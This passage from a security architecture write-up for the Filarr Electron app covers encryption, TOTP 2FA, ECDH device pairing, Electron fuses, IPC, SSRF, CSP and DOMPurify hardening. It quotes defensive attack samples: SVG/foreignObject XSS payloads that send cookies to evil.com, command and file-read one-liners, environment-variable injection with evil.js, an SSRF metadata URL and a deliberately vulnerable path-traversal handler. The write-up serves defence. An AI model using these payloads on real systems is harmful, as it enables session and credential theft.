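The decryption counterpart, sketched to show that all-or-nothing behavior:
async function decryptBlob(blob: Uint8Array, fek: CryptoKey): Promise<Uint8Array> {
  const nonce = blob.subarray(4, 16);   // the 4-byte marker was checked upstream
  const ctAndTag = blob.subarray(16);
  try {
    return new Uint8Array(
      await crypto.subtle.decrypt({ name: 'AES-GCM', iv: nonce }, fek, ctAndTag),
    );
  } catch {
    // Invalid tag: Web Crypto throws — no partial plaintext is ever returned.
    throw new Error('Ciphertext authentication failed');
  }
}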
6. Two-factor authentication (2FA)
Client-side encryption protects your files against a compromised server, but it does not protect your account against an online takeover. An attacker who guesses your password through credential stuffing can log in, exfiltrate server-visible metadata and trigger vault deletion. IP-based rate limiting alone is not enough: a botnet rotating 5,000 residential IPs flies under the radar. As of April 2026, Filarr therefore offers TOTP-based two-factor authentication, opt-in, enabled from Settings > Security (free accounts included).
6.1 Why TOTP RFC 6238
Filarr uses standard TOTP RFC 6238: SHA-1, 6 digits, 30s period, ±1 step tolerance window. This is a deliberate choice over WebAuthn / Passkeys. WebAuthn offers better anti-phishing protection but requires compatible hardware (Touch ID, YubiKey, Windows Hello) and uneven portability across devices and browsers. TOTP works everywhere with any standard authenticator — Authy, Google Authenticator, 1Password, Bitwarden, and dozens more — with nothing server-side beyond a base32 secret and an RFC-compliant verifier. This portability is coherent with the model "your password remains the cryptographic source of truth": 2FA complements server-side auth, it does not replace local crypto.
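For reference, an RFC 6238 verifier with exactly these parameters fits in a few lines — a sketch in Node flavor (the actual worker code presumably goes through Web Crypto; helper names are illustrative, and base32 decoding of the secret is assumed done upstream):
import { createHmac, timingSafeEqual } from 'node:crypto';

function hotp(secret: Buffer, counter: bigint): string {
  const msg = Buffer.alloc(8);
  msg.writeBigUInt64BE(counter);
  const mac = createHmac('sha1', secret).update(msg).digest();
  const offset = mac[mac.length - 1] & 0x0f;                        // dynamic truncation (RFC 4226)
  const code = (mac.readUInt32BE(offset) & 0x7fffffff) % 1_000_000; // 6 digits
  return code.toString().padStart(6, '0');
}

function verifyTotp(secret: Buffer, submitted: string, now = Date.now()): boolean {
  const step = BigInt(Math.floor(now / 1000 / 30));  // 30 s period
  for (const skew of [-1n, 0n, 1n]) {                // ±1 step tolerance window
    const expected = Buffer.from(hotp(secret, step + skew));
    const given = Buffer.from(submitted);
    if (given.length === expected.length && timingSafeEqual(given, expected)) return true;
  }
  return false;
}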
6.2 Backup codes, hashed as HMAC-SHA-256
At activation, Filarr generates 8 single-use backup codes. Each code is stored as an HMAC-SHA-256 digest; the HMAC key derives from the worker's JWT_SECRET, which never lives in D1. Using HMAC instead of bcrypt is not a security compromise: with 40 bits of random entropy per code, an attacker who exfiltrates D1 also has to compromise the separately-stored JWT_SECRET; and even with both, brute-forcing HMAC-SHA-256 over 40 bits of uniform randomness remains expensive. Bcrypt cost 12 (≈250 ms per attempt) is simply not viable on a Cloudflare Worker's 50 ms CPU budget — with native HMAC in Web Crypto, verification takes microseconds and operational cost is zero.
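A sketch of that scheme — shown in Node flavor for brevity (the worker would use Web Crypto's native HMAC); names are illustrative:
import { createHmac, randomBytes } from 'node:crypto';

function generateBackupCodes(jwtSecret: string) {
  const plain: string[] = [];    // shown once to the user, never stored
  const digests: string[] = [];  // what actually lands in D1
  for (let i = 0; i < 8; i++) {
    const code = randomBytes(5).toString('hex');  // 5 bytes = 40 bits of entropy
    plain.push(code);
    digests.push(createHmac('sha256', jwtSecret).update(code).digest('hex'));
  }
  return { plain, digests };
}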
6.3 What 2FA does NOT protect
Important: 2FA protects only the account login. It interposes a barrier at sign-in via a two-step flow: password → short 5-minute MFA token → TOTP code or backup code → session tokens, with a 10 attempts / 15 min / IP rate limit on the second step. But if an attacker exfiltrates the encrypted copy of your master key stored server-side, they can attempt an offline brute-force — and there, 2FA does nothing at all. Only the strength of your password and the 600,000 PBKDF2-SHA-512 iterations do the work. 2FA is an anti-takeover defense distinct from the crypto defense; the two are complementary, not substitutes.
Recovery-phrase regeneration (24-word BIP-39) and backup-code regeneration are also available from Settings > Security — both invalidate the previous artifacts immediately.
7. Multi-device pairing
FEK sharing between multiple devices is probably the cryptographically trickiest part of the entire architecture. The constraint is clear: we want a user who has already unlocked their account on their laptop (Device A) to be able to add their smartphone or a second laptop (Device B) to the same account, with access to all data, without the server ever seeing the FEK in cleartext. How to transmit a secret key through an untrusted channel (the server) without the channel being able to read it? That's precisely the problem Diffie-Hellman key exchanges have solved since 1976, with solid mathematical guarantee.
7.1 The full protocol in v2.2.2+
The basic idea of a Diffie-Hellman exchange is that two parties can derive a shared secret by exchanging public keys over an open channel, without a passive observer being able to reconstitute this secret. In modern cryptography, we use the elliptic curve variant (ECDH) which offers the same security as classical Diffie-Hellman with much shorter keys: an ECDH key on the P-256 curve is 256 bits, versus about 3072 bits for equivalent security with modular Diffie-Hellman.
Here's the full Filarr protocol:
┌─────────────────────────────┬─────────────────────────────┐
│ DEVICE A │ DEVICE B │
├─────────────────────────────┼─────────────────────────────┤
│ 1. Generate (privA, pubA) │ │
│ ECDH P-256 │ │
│ 2. Generate 6-digit code │ │
│ via crypto.randomInt() │ │
│ 3. PUT /pairing/<code> { │ │
│ pubA: base64 │ │
│ } (TTL 5 min) │ │
│ │ 4. User enters code │
│ │ 5. GET /pairing/<code> │
│ │ → receives pubA │
│ │ 6. Generate (privB, pubB) │
│ │ 7. sharedBits = │
│ │ ECDH(privB, pubA) │
│ │ 8. wrapKey = │
│ │ HKDF-SHA-256( │
│ │ ikm=sharedBits, │
│ │ salt=code, │
│ │ info="filarr. │
│ │ pairing.wrap.v1", │
│ │ length=32 │
│ │ ) │
│ │ 9. PUT /pairing/<code>/ │
│ │ device-b-pubkey { │
│ │ pubB: base64 │
│ │ } │
│ 10. Poll /pairing/<code> │ │
│ → receives pubB │ │
│ 11. sharedBits = │ │
│ ECDH(privA, pubB) │ │
│ 12. wrapKey = HKDF(...) │ │
│ (identical to B) │ │
│ 13. iv = random(12) │ │
│ 14. wrappedFEK = │ │
│ AES-256-GCM.wrap( │ │
│ fek, wrapKey, iv │ │
│ ) │ │
│ 15. PUT /pairing/<code>/ │ │
│ wrapped-fek { │ │
│ blob: base64( │ │
│ iv ++ wrappedFEK │ │
│ ) │ │
│ } │ │
│ │ 16. Poll /pairing/<code> │
│ │ → receives blob │
│ │ 17. fek = AES-256-GCM │
│ │ .unwrap(blob, wrapKey) │
│ │ 18. Store fek via │
│ │ safeStorage OS │
│ │ 19. DELETE /pairing/<code> │
└─────────────────────────────┴─────────────────────────────┘
What the Filarr server sees transiting through this protocol is limited to public elements: Device A's public key (pubA, a P-256 curve point that reveals nothing about the private key by the very definition of the ECDLP — Elliptic Curve Discrete Logarithm Problem), Device B's public key symmetrically, the 6-digit pairing code, and an opaque blob iv ++ wrappedFEK. This blob is encrypted by a key the server cannot reconstruct, because that would require knowing either privA or privB, ephemeral private keys that never leave the devices. Even a server that records everything it relays learns nothing usable: every secret quantity in the exchange is derived on the devices, from material the server only ever sees in public or encrypted form.
7.2 HKDF extract-expand and why it had to be added in v2.2.2
Before v2.2.2, the code used the raw 256 bits returned by crypto.subtle.deriveBits() directly as the AES-256 key to wrap the FEK. It works in practice — the 256 bits are random in the curve group — but it technically violates the formal assumptions under which AES-GCM is proven secure.
The subtle problem is that bits from an ECDH point aren't uniformly distributed in {0, 1}^256. They're random within the group — that is, they represent a random point on the elliptic curve — but the curve's structure means some 256-bit sequences correspond to no valid point, while others are more frequent. This non-uniformity isn't naked-eye visible (coordinates look like noise), but it's statistically measurable and, more importantly, breaks the AES-GCM security proof that assumes uniformly random keys in {0, 1}^256.
The standard response to this problem is HKDF (RFC 5869), a two-step construction that transforms any sufficiently entropic source into a uniformly distributed key. The first step, Extract, computes PRK = HMAC-SHA-256(salt, ikm) where ikm is the input keying material (ECDH sharedBits in our case). The PRK result is a concentrated pseudo-random key, uniformly distributed in {0, 1}^256. The second step, Expand, derives the output key(s) via OKM = HMAC-SHA-256(PRK, info || 0x01). This two-phase separation is formally analyzed: it proves that an adversary observing OKM cannot distinguish the output distribution from a truly random uniform distribution, even having access to ikm (under reasonable assumptions on HMAC).
Adding HKDF in Filarr v2.2.2 was defense-in-depth hardening: in practice, no known attack exploited the non-uniformity of ECDH bits against AES-GCM in 2026, but respecting formal assumptions guarantees we won't be caught off guard if an academic paper tomorrow publishes a new attack exploiting this non-uniformity.
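Concretely, steps 7–8 of the diagram (and their mirror, steps 11–12) map onto Web Crypto like this — a sketch using the labels discussed in §7.3 just below:
async function deriveWrapKey(myPriv: CryptoKey, theirPub: CryptoKey, code: string): Promise<CryptoKey> {
  // Step 7/11: raw ECDH shared secret — random in the group, not uniform in {0,1}^256.
  const sharedBits = await crypto.subtle.deriveBits({ name: 'ECDH', public: theirPub }, myPriv, 256);
  // Step 8/12: HKDF extract-expand turns it into a uniformly distributed AES key.
  const ikm = await crypto.subtle.importKey('raw', sharedBits, 'HKDF', false, ['deriveKey']);
  return crypto.subtle.deriveKey(
    {
      name: 'HKDF',
      hash: 'SHA-256',
      salt: new TextEncoder().encode(code),                     // the 6-digit pairing code
      info: new TextEncoder().encode('filarr.pairing.wrap.v1'), // domain separator
    },
    ikm,
    { name: 'AES-GCM', length: 256 },
    false,
    ['encrypt', 'decrypt'],  // wraps / unwraps the FEK
  );
}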
7.3 The domain separator, belt and suspenders
HKDF's info field, which we fixed to the literal string "filarr.pairing.wrap.v1", isn't cosmetic. It serves an important function called domain separation: guaranteeing that the same entropy source (sharedBits) will never produce the same derived key for two different uses, even when using the same algorithm (HKDF-SHA-256 here).
Imagine we add a new feature tomorrow: signing sync manifests with a key derived from the pairing ECDH exchange. If we used HKDF with the same info parameter, the signing key would be identical to the wrap key, creating a hidden dependency between two distinct cryptographic primitives. An attack on one (for example, a signing key leak via side-channel) would compromise the other. With different info per use ("filarr.pairing.wrap.v1" vs "filarr.pairing.sign.v1"), derived keys are independent under HKDF assumptions, even if starting from the same sharedBits. It's the pattern recommended by NIST SP 800-56C for all key derivation uses from a shared secret.
The v1 suffix in the label is also intentional: if we change the wrap algorithm (e.g., switching to ChaCha20-Poly1305), we'll move to v2, guaranteeing that a blob encrypted with the old version isn't accidentally interpreted as a new format.
7.4 The 6-digit code and its security
The 6-digit code offers about 20 bits of entropy — 1,000,000 possible combinations. One might worry that an attacker could bruteforce the /pairing/<code> API to guess the code and intercept the encrypted blob. Several layered defenses make this attack non-viable.
First, the code has a 5-minute TTL server-side: past this delay, the entry is deleted and the code no longer corresponds to anything. The attacker therefore has only 5 minutes to bruteforce. Next, the server applies a rate limit on /pairing/<code> accesses: typically 10 attempts per minute per IP, with progressive blocking beyond. In 5 minutes, an attacker can thus test at most ~50 codes. Over 10^6 possibilities, that's a 0.005% probability of hitting the right code. Mathematically negligible, but combine it with the fact that the attacker would also need to guess the code at the exact moment it's valid, adding a temporal dimension to the problem.
Finally, and most importantly, the code is transmitted out of band: it's displayed on Device A's screen and typed by hand on Device B. The server never generates or distributes it — Device A's client generates the code locally via crypto.randomInt() and declares it as the channel identifier, while Device B receives it directly from the physical user standing in front of both screens. An attacker listening on the network path between the two devices never sees the code exchanged between them.
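The generation itself is one line, sketched here with Node's CSPRNG-backed helper:
import { randomInt } from 'node:crypto';

// Uniform in [0, 1,000,000), zero-padded to 6 digits — never Math.random().
const pairingCode = randomInt(0, 1_000_000).toString().padStart(6, '0');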
To complete the picture, ECDH additionally provides forward secrecy: privA and privB private keys are ephemeral and deleted after pairing. If an attacker obtains the code after its expiration, or even if they compromise the server later, they can no longer reconstruct the wrap key because the private keys no longer exist.
7.5 Comparison with Signal's approach
A reader familiar with Signal might wonder why Filarr doesn't use Signal's Safety Numbers for verification. The answer lies in the different use case.
Signal uses 60-digit fingerprints derived from the two contacts' persistent public keys, compared visually or by scanning a QR code. This model is suited to persistent messaging: once Alice has added Bob to her contacts and verified his Safety Number, she can message him for years without re-verification, as long as Bob doesn't switch devices. But the initial cost is a 60-digit comparison, which is OK for a friend you're going to see in person but heavy for one-shot self-pairing.
The Filarr model, closer to Apple Continuity / Handoff or the WireGuard PSK + key exchange approach, uses a short one-time code. It's less secure in absolute terms (20 bits vs ~200 bits for a full Safety Number), but suited to the rare use case of adding a new device to your own account, with a physical trust channel (the user reads the code on one screen and types it on another).
8. Electron hardening
Electron is a framework that combines two potentially dangerous components: Chromium, which exposes the entire modern web attack surface (XSS, CSRF, DOM clobbering, prototype pollution...), and Node.js, which allows full system access (filesystem, processes, network, shell commands). By default, an Electron app doing nothing special exposes this explosive combination to code loaded in the renderer. If an attacker succeeds with an XSS, they can directly call require('child_process').exec('rm -rf /') and it's game over. All Filarr application security rests on breaking this chain architecturally: the renderer cannot access the system directly, it goes through strictly typed and allowlisted IPC channels.
8.1 The three fundamental isolations
The minimal configuration for a modern Electron app to be defensible is to enable three flags together in webPreferences:
webPreferences: {
nodeIntegration: false, // No require() in the renderer
contextIsolation: true, // contextBridge isolates preload from renderer
sandbox: true, // Renderer runs in Chromium sandbox
preload: path.join(__dirname, 'preload.js'),
}
Without these three flags, all other security measures are cosmetic. Each deserves explanation.
nodeIntegration: false guarantees that JavaScript code loaded in the renderer has no access to require(), process, global, or other Node.js globals. The renderer is in the same state as a standard Chrome tab: it can manipulate the DOM and call Web APIs (fetch, localStorage, crypto.subtle, etc.) but cannot read a local file or spawn a process. Without this flag, any XSS in a frontend dependency becomes a full RCE (Remote Code Execution), because the attacker can do require('fs').readFileSync('/etc/passwd').
contextIsolation: true goes further: it places preload code in a V8 realm separate from page code. Even if the preload needs ipcRenderer (to expose methods to the renderer via contextBridge), this module isn't accessible from the page. Both realms share the DOM but not JavaScript globals. Concretely, if an attacker does prototype pollution in the page realm (modifying Array.prototype for example), it doesn't touch the preload. Without contextIsolation, the contextBridge bridge is just syntactic sugar and exposed objects can be subverted by the page.
sandbox: true places the renderer process in the Chromium sandbox, an OS-level isolation mechanism Google has developed and hardened since 2008 to block escapes. Implementation differs by OS but the principle is the same: the renderer process can only talk to the rest of the system through an IPC channel with the main process (Chromium's browser process). On Windows, the sandbox uses a mix of a Restricted Token (dropping administrative privileges such as SeTcbPrivilege), a Job object (limiting resources), and Windows Integrity Level Low (preventing the process from writing to system areas). On macOS, it's Seatbelt, derived from sandbox-exec with a Chromium-specific profile listing allowed syscalls. On Linux, it's a combination of user namespaces (giving the process the illusion of being root while confined), seccomp-bpf (whitelisting syscalls at kernel level), and chroot (restricting the filesystem view). A well-configured sandbox blocks in practice syscalls like mount, ptrace, kexec_load, and most operations that would allow an attacker to escape the process.
8.2 Electron fuses — binary-level integrity
"Fuses" (@electron/fuses) are a relatively recent and little-known mechanism: configuration bits flipped directly in the Electron binary at packaging time, which can no longer be modified in production without recompiling the application. They close Electron runtime default behaviors that were useful in development but dangerous in production.
Since v2.2.2, Filarr applies 8 explicit fuses with the strictlyRequireAllFuses: true parameter. This parameter forces listing all known fuses of the Electron version used; if a future Electron version adds a new fuse with an insecure default, the build will fail and force an explicit decision. It's fail-closed applied to security configuration.
| Fuse | Value | What it blocks |
|---|---|---|
| RunAsNode | false | ELECTRON_RUN_AS_NODE=1 filarr.exe ./evil.js — turning Filarr into an arbitrary Node runtime for user code |
| EnableCookieEncryption | true | Cookies encrypted via DPAPI/Keychain/libsecret — an attacker reading the Cookies SQLite file can't extract cleartext tokens |
| EnableNodeOptionsEnvironmentVariable | false | NODE_OPTIONS=--require=/tmp/evil.js filarr.exe — Node module injection at launch |
| EnableNodeCliInspectArguments | false | --inspect, --inspect-brk — a debug port on a prod binary = RCE |
| EnableEmbeddedAsarIntegrityValidation | true | Cryptographic integrity validation of app.asar (macOS + Windows) — the app refuses to start if malware patched the JS on disk |
| OnlyLoadAppFromAsar | true | Refuses to load from an unpacked directory next to the binary — classic persistence vector |
| LoadBrowserProcessSpecificV8Snapshot | false | Default behavior (no separate snapshot) |
| GrantFileProtocolExtraPrivileges | true | Kept for file:// compat in prod — TODO v2.3: migrate to custom app:// and set to false |
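At packaging time, the whole table above boils down to one flipFuses call — a sketch with an illustrative binary path, run before code signing:
import { flipFuses, FuseVersion, FuseV1Options } from '@electron/fuses';

await flipFuses('./dist/Filarr.app/Contents/MacOS/Filarr', {
  version: FuseVersion.V1,
  strictlyRequireAllFuses: true,  // build fails if a known fuse is left unspecified
  [FuseV1Options.RunAsNode]: false,
  [FuseV1Options.EnableCookieEncryption]: true,
  [FuseV1Options.EnableNodeOptionsEnvironmentVariable]: false,
  [FuseV1Options.EnableNodeCliInspectArguments]: false,
  [FuseV1Options.EnableEmbeddedAsarIntegrityValidation]: true,
  [FuseV1Options.OnlyLoadAppFromAsar]: true,
  [FuseV1Options.LoadBrowserProcessSpecificV8Snapshot]: false,
  [FuseV1Options.GrantFileProtocolExtraPrivileges]: true,
});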
A revealing anecdote occurred during the Electron 41 upgrade smoke test in v2.3.0. Running npm start for the first time after the upgrade, the app refused to launch with a cryptic error: TypeError: Cannot read properties of undefined (reading 'isPackaged') on the line const isDev = !electron_1.app.isPackaged. After investigation, the cause was that an environment variable ELECTRON_RUN_AS_NODE=1 was lingering in the dev shell (set by an internal tool for another project), and it was forcing Electron to run as a plain Node.js runtime rather than as an Electron app. require('electron') therefore returned the binary path rather than the API namespace. This dev bug had no consequences, but it perfectly illustrated the attack scenario the RunAsNode: false fuse targets: in production, a local attacker with user-level access to the machine could set ELECTRON_RUN_AS_NODE=1 in the environment and launch filarr.exe ./malicious_script.js to execute arbitrary code with the user's privileges, using our own signed binary as a vector. The fuse neutralizes this variable in the final binary: even if defined, Electron ignores it and starts in app mode. This fortuitous validation reassured us that the defense works.
8.3 IPC allowlist and preload
The preload (electron/preload.ts) is the only place where Node.js code runs with access to contextBridge and ipcRenderer. Its role is to expose to the renderer a minimal API, via contextBridge.exposeInMainWorld('electron', { ... }), containing only methods necessary for app operation. The renderer cannot access ipcRenderer directly, cannot call require(), cannot touch process or global. Each exposed method corresponds to a typed IPC channel, handled on the main process side with strict argument validation.
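In sketch form, with channel names borrowed from this article (the real preload exposes more methods than this):
import { contextBridge, ipcRenderer } from 'electron';

contextBridge.exposeInMainWorld('electron', {
  // One method per typed channel — ipcRenderer itself is never handed to the page.
  selectImportFile: () => ipcRenderer.invoke('import:selectFile'),
  readImportFile: (filePath: string) => ipcRenderer.invoke('import:readFile', filePath),
  openExternal: (url: string) => ipcRenderer.invoke('open-external', url),
});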
To illustrate the difference between vulnerable and hardened versions, here's the import:readFile handler before and after v2.2.1:
// Shared imports for both snippets (added here for completeness)
import { dialog, ipcMain } from 'electron';
import * as fs from 'fs/promises';
import * as path from 'path';

// BEFORE v2.2.1 — vulnerable to path traversal
ipcMain.handle('import:readFile', async (_e, filePath: string) => {
  return fs.readFile(filePath, 'utf-8'); // any path the renderer asks for is read
});

// AFTER v2.2.1 — path whitelist
const approvedImportPaths = new Set<string>();
const isApprovedPath = (p: string) => approvedImportPaths.has(path.resolve(p));

ipcMain.handle('import:selectFile', async () => {
  // Only a native dialog, i.e. the user, can add a path to the whitelist
  const { canceled, filePaths } = await dialog.showOpenDialog({ properties: ['openFile'] }); // options illustrative
  if (canceled) return null;
  approvedImportPaths.add(path.resolve(filePaths[0]));
  return filePaths[0];
});

ipcMain.handle('import:readFile', async (_e, filePath: string) => {
  if (!isApprovedPath(filePath)) return null; // ← blocked: path never approved via a dialog
  const stats = await fs.lstat(filePath);
  if (stats.isSymbolicLink()) return null;    // ← symlink escape blocked
  return fs.readFile(filePath, 'utf-8');
});
The difference is fundamental: in the vulnerable version, an XSS in the renderer could call invoke('import:readFile', '/home/victim/.ssh/id_rsa') and exfiltrate the SSH key. In the hardened version, only paths the user has explicitly chosen via a native dialog are accepted. The renderer can at most trigger the native dialog via import:selectFile, but that dialog is visible UI, and only the path the user actually picks enters the whitelist; a script cannot populate it with paths of its own choosing. Symlinks are also rejected to prevent an imported ZIP from containing a symbolic link pointing to /etc/passwd that Filarr would then read at extraction time.
Other handlers have been hardened similarly. vault:importZip received a cap of 500 MB total decompressed, 50 MB per entry, and 10,000 entries maximum, and rejects entries containing .. or absolute paths — these caps protect against ZIP bombs (archives decompressing to several gigabytes) and ZIP slip attacks (entries whose paths escape the destination folder). open-external now uses strict new URL(url) parsing that rejects any scheme other than http: and https:, ASCII control characters, and URLs over 8 KB. This last check is applied even to URLs returned by our own backend for Stripe checkouts, as defense in depth against a compromised backend trying to force opening a javascript: or file: URL.
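As a sketch of that validation logic (the helper name is hypothetical; the three rules, the scheme allowlist, control-character rejection, and the 8 KB cap, come from the paragraph above):
// Sketch of the strict external-URL validation (helper name hypothetical)
function isSafeExternalUrl(raw: string): boolean {
  if (raw.length > 8 * 1024) return false;              // cap at 8 KB
  if (/[\u0000-\u001f\u007f]/.test(raw)) return false;  // reject ASCII control characters
  let parsed: URL;
  try {
    parsed = new URL(raw);                              // strict parsing; throws on malformed input
  } catch {
    return false;
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:';
}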
8.4 Permission handlers
Modern Web APIs include an impressive number of sensitive permissions: camera, microphone, geolocation, USB, MIDI, Bluetooth, serial port, HID, screen capture, background sync, and more obscure ones. By default, Electron prompts the user when a page requests one of these permissions. Filarr goes further and refuses everything not on a three-entry allowlist, via a strict handler:
mainWindow.webContents.session.setPermissionRequestHandler(
(_, permission, callback) => {
const allowed = ['clipboard-read', 'clipboard-sanitized-write', 'notifications'];
callback(allowed.includes(permission));
}
);
Only three permissions are allowed: reading clipboard (to paste text), writing to clipboard in sanitized fashion (to copy text, never rich HTML that could be dangerous), and displaying desktop notifications (for reminders). Everything else is silently refused. Even if an XSS tried to call navigator.mediaDevices.getUserMedia() to access the webcam, the call would immediately return an error without user prompt.
8.5 SSRF protection
When Filarr displays link previews in notes (via the fetchPageTitle and fetchPageMetadata IPC handlers), it must make HTTP requests to user-cited URLs. This is a classic SSRF (Server-Side Request Forgery) attack surface: an attacker could place in a shared note a link like http://169.254.169.254/latest/meta-data/iam/security-credentials/ which, if fetched from an AWS machine, would return the instance's temporary IAM credentials. This isn't hypothetical: it's exactly the mechanism of CVE-2019-8451 in Jira, where the link preview feature allowed exfiltrating IAM credentials from the Jira server.
Filarr implements an isPrivateOrReservedUrl() helper that blocks all internal targets before making the request: localhost, 127.0.0.1, [::1], 0.0.0.0, the RFC 1918 private ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), IPv4 and IPv6 link-local (which covers 169.254.169.254 and its variants), and IPv6 unique-local. A request to a blocked target immediately returns an error. This list is maintained as new cloud metadata ranges appear (AWS, GCP, Azure, and DigitalOcean all have their own metadata IPs, generally in 169.254.0.0/16).
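Here is a deliberately simplified sketch of such a check; the real isPrivateOrReservedUrl covers more ranges and edge cases, and the helper below only inspects literal hostnames and IPs:
// Simplified sketch of the private/reserved-target check (not Filarr's exact code)
import * as net from 'net';

function isPrivateOrReservedHost(hostname: string): boolean {
  const h = hostname.toLowerCase().replace(/^\[|\]$/g, ''); // strip IPv6 brackets
  if (h === 'localhost' || h === '0.0.0.0') return true;
  if (net.isIPv4(h)) {
    const [a, b] = h.split('.').map(Number);
    if (a === 127 || a === 10) return true;                 // loopback, 10.0.0.0/8
    if (a === 172 && b >= 16 && b <= 31) return true;       // 172.16.0.0/12
    if (a === 192 && b === 168) return true;                // 192.168.0.0/16
    if (a === 169 && b === 254) return true;                // link-local, incl. 169.254.169.254
    return false;
  }
  if (net.isIPv6(h)) {
    if (h === '::1') return true;                           // IPv6 loopback
    if (h.startsWith('fe8') || h.startsWith('fe9') ||
        h.startsWith('fea') || h.startsWith('feb')) return true; // link-local fe80::/10
    if (h.startsWith('fc') || h.startsWith('fd')) return true;   // unique-local fc00::/7
  }
  return false;
}
Note that a production implementation must also apply this check to the resolved IP address, not just the hostname, or a DNS rebinding attack could slip past it.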
9. Content Security Policy
The Content Security Policy is the last line of defense if everything else fails. Filarr applies a strict CSP on all responses served to the renderer, via an onHeadersReceived handler that injects headers into the Chromium session:
default-src 'self';
script-src 'self' https://cdnjs.cloudflare.com;
style-src 'self' 'unsafe-inline';
img-src 'self' data: blob:;
font-src 'self' data: blob: *;
connect-src 'self' https://*.filarr-app.workers.dev
https://api.filarr.com
https://*.ingest.de.sentry.io;
worker-src 'self' blob: https://cdnjs.cloudflare.com;
frame-src https://www.youtube-nocookie.com https://www.youtube.com
https://player.vimeo.com;
object-src 'none';
base-uri 'self';
form-action 'self';
frame-ancestors 'none';
Beyond CSP, we systematically apply X-Content-Type-Options: nosniff (preventing abusive MIME sniffing), X-Frame-Options: DENY (blocking embedding in external iframes), Referrer-Policy: strict-origin-when-cross-origin (limiting URL leakage in Referer headers), Permissions-Policy: camera=(), microphone=(), geolocation=(), usb=() (permission handler backup for user agents that still respect this header), and Strict-Transport-Security: max-age=31536000; includeSubDomains (enabling HSTS across the entire Filarr domain family).
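In terms of wiring, a sketch of that onHeadersReceived injection looks like this; the directive list is abridged to a few entries from the policy above, and the header set mirrors the paragraph you just read:
// main process — sketch of injecting the CSP and companion headers (directives abridged)
import { app, session } from 'electron';

const CSP = [
  "default-src 'self'",
  "script-src 'self' https://cdnjs.cloudflare.com",
  "object-src 'none'",
  "frame-ancestors 'none'",
  // ...remaining directives exactly as listed above
].join('; ');

app.whenReady().then(() => {
  session.defaultSession.webRequest.onHeadersReceived((details, callback) => {
    callback({
      responseHeaders: {
        ...details.responseHeaders,
        'Content-Security-Policy': [CSP],
        'X-Content-Type-Options': ['nosniff'],
        'X-Frame-Options': ['DENY'],
        'Referrer-Policy': ['strict-origin-when-cross-origin'],
      },
    });
  });
});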
Two concessions in this config deserve documentation because they contravene the "block everything by default" principle. First, 'unsafe-inline' on style-src is required by React's inline style attributes: React generates inline CSS for its components, and moving to a nonce-based solution would break the entire rendering pipeline. This concession is mitigated by the contextIsolation + sandbox + DOMPurify combination: even if an attacker injects malicious CSS, they can't execute JavaScript through it. Second, script-src allows cdnjs.cloudflare.com in addition to 'self' because KaTeX and Mermaid are loaded from cdnjs to reduce bundle size. We could bundle everything locally (it's on the roadmap), but the current tradeoff is accepting a single trusted third-party domain in exchange for a bundle that is 500 KB smaller.
The object-src 'none' header eliminates all legacy plugin attack surface (Flash, ActiveX, Java Applet), which no modern app should allow. The frame-ancestors 'none' header prevents Filarr from being embedded in an iframe by an external site, blocking clickjacking attacks.
10. XSS sanitization
All HTML ending up inserted into the renderer DOM goes through DOMPurify 3.4.0+, the open-source reference in the field maintained by Cure53. The defensive configuration was widened in v2.2.1 based on the security audit:
import DOMPurify from 'dompurify';

const clean = DOMPurify.sanitize(html, {
  ADD_ATTR: ['target', 'rel'],
  FORBID_TAGS: [
    'style', 'form', 'input', 'textarea', 'select',
    'iframe', 'object', 'embed',
    'svg', 'math', 'foreignObject', 'annotation-xml',
    'base', 'meta', 'link',
  ],
  FORBID_ATTR: ['style', 'srcdoc', 'formaction', 'ping'],
  ALLOWED_URI_REGEXP: /^(?:(?:https?|mailto|tel):|...)/i, // remainder of the pattern elided here
});
Why forbid <svg> when SVG seems a priori harmless as an image format? Because SVG is a classic Trojan horse for bypassing naive sanitizers. The <foreignObject> tag inside an SVG allows embedding arbitrary HTML, including <iframe> with srcdoc attribute, <script>, or event handlers like onclick. A sanitizer blocking <iframe> but allowing <svg> would let through:
<svg>
<foreignObject>
<iframe srcdoc="<script>fetch('/api/exfil?cookie='+document.cookie)</script>">
</iframe>
</foreignObject>
</svg>
Historically, DOMPurify itself has had several CVEs around SVG and MathML (the MathML 3.0 spec is full of similar surprises). Version 3.4.0 fixes all known bypasses, but the defensive blocklist remains a belt-and-suspenders complement: if a new bypass is discovered tomorrow in a hypothetical 3.5 release, our blocklist still removes the vector.
The forbidden attributes srcdoc, formaction and ping are all lesser-known but very real attack vectors. srcdoc allows executing inline HTML in an iframe, bypassing CSP restrictions targeting the src attribute. formaction lets a form button redirect submission to a different URL than the one specified by the <form>, letting an attacker exfiltrate data via an innocent-looking form. ping lets an <a> link send a silent POST to an arbitrary URL when the user clicks — a feature intended for analytics tracking but usable to exfiltrate data. Blocking these three attributes costs zero legitimate functionality in the Filarr context.
Beyond DOMPurify, Filarr applies validations specific to certain content types. Wiki-links [[Note]] imported from an Obsidian vault are validated as pointing only to existing note titles, never interpreted as URLs. An attacker who sneaked [[javascript:alert(1)]] into a shared vault would see their link rendered as plain text (because no note is named javascript:alert(1)) rather than as a clickable link with the javascript: scheme. Mermaid diagrams are rendered with the securityLevel: 'strict' option, which disables HTML execution in labels, click handlers, and inline scripts generated by the parser — three vectors that have all had historical CVEs in Mermaid.
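The Mermaid side of this hardening fits in one initialization call; securityLevel: 'strict' is the option named above, while startOnLoad: false is an assumption about how Filarr drives rendering:
// Mermaid hardened initialization (securityLevel per the text; startOnLoad assumed)
import mermaid from 'mermaid';

mermaid.initialize({
  securityLevel: 'strict', // no HTML in labels, no click handlers, no inline scripts
  startOnLoad: false,      // render explicitly, never auto-scan the DOM
});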
11. Anatomy of a kill chain
To understand how defenses chain together, nothing beats a concrete case. Here's what a determined attacker could do against Filarr v2.2.0, and what blocks each step in the current v2.3.1 version. The scenario is inspired by real attacks against other Electron apps and represents a plausible supply chain + XSS model.
11.1 The scenario
An attacker publishes a popular "Obsidian plugin" called Awesome Tag Cloud v2 on an Obsidian vault-sharing community. The plugin looks legitimate: it generates nice tag clouds. But its README.md file contains an HTML tag crafted by the attacker, designed to trigger an exploitation cascade when the vault is imported into Filarr via the import wizard.
The target user downloads this booby-trapped vault, opens it in Filarr, and launches the Obsidian → Filarr import wizard. At the moment the README note is rendered in the editor, the payload activates.
11.2 Phase 1 — Initial Access (T1189)
In the version prior to v2.2.1, the DOMPurify configuration didn't include svg or foreignObject in the blocklist. The attacker's payload could therefore inject a block:
<svg><foreignObject>
<iframe srcdoc="<script>fetch('https://evil.com/beacon?u='+encodeURIComponent(document.cookie))</script>"></iframe>
